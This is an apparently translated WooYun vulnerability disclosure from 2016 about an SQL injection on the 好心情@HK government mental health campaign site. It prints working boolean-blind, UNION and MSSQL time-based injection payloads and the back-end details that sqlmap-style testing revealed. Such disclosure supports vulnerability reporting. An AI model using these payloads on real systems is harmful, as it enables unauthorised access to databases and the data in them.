SQL injection on the 好心情@HK official website exposes multiple databases on the same server (Hong Kong)

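ID: 224063
URL: http://www.wooyun.org/bug.php?action=view&id=224063
Status: Handed over to a third-party partner organization (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre) for handling
Title: SQL injection on the 好心情@HK official website exposes multiple databases on the same server (Hong Kong)
Vulnerability type: SQL injection
Vendor: 好心情@HK
White hat: 路人甲
Submitted: 2016-06-29 09:24:00
Disclosed: 2016-07-04 09:35:00
Fix time: (not set)
Confirmation time: 0000-00-00 00:00:00
Confirm Spend: -1
Vulnerability tags:
Followers: 0
Favorites: 0
White hat rating
White hat self-assessed rank: 16
Vendor rating
Vendor-assessed rank: 0
Vulnerability summary
好心情@HK (the "Campaign") is a three-year, territory-wide mental health promotion campaign launched by the Department of Health in January 2016.
Campaign objectives:
to increase public engagement in mental health promotion, and
to increase public knowledge and understanding of mental health.
Vulnerability details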

http://**.**.**.**/sc/event_details.asp?id=3 (GET)

POC

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 8705=8705
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7236 UNION ALL SELECT CHAR(113)+CHAR(105)+CHAR(109)+CHAR(122)+CHAR(113)+CHAR(117)+CHAR(90)+CHAR(79)+CHAR(115)+CHAR(80)+CHAR(81)+CHAR(66)+CHAR(113)+CHAR(77)+CHAR(100)+CHAR(113)+CHAR(110)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: id=-9410 OR 3743=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [69]:

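Remediation

Parameter filtering

Status information
2016-06-29: Details reported to the vendor; awaiting vendor handling
2016-06-29: The vendor has viewed the vulnerability; details are disclosed only to the vendor
2016-07-04: The vendor has actively ignored the vulnerability; details are disclosed to the public
Vendor response: None
Vulnerability rank: 4 (WooYun assessment)
Response information
Severity: No impact
Ignored by vendor
Ignored at: 2016-07-04 09:35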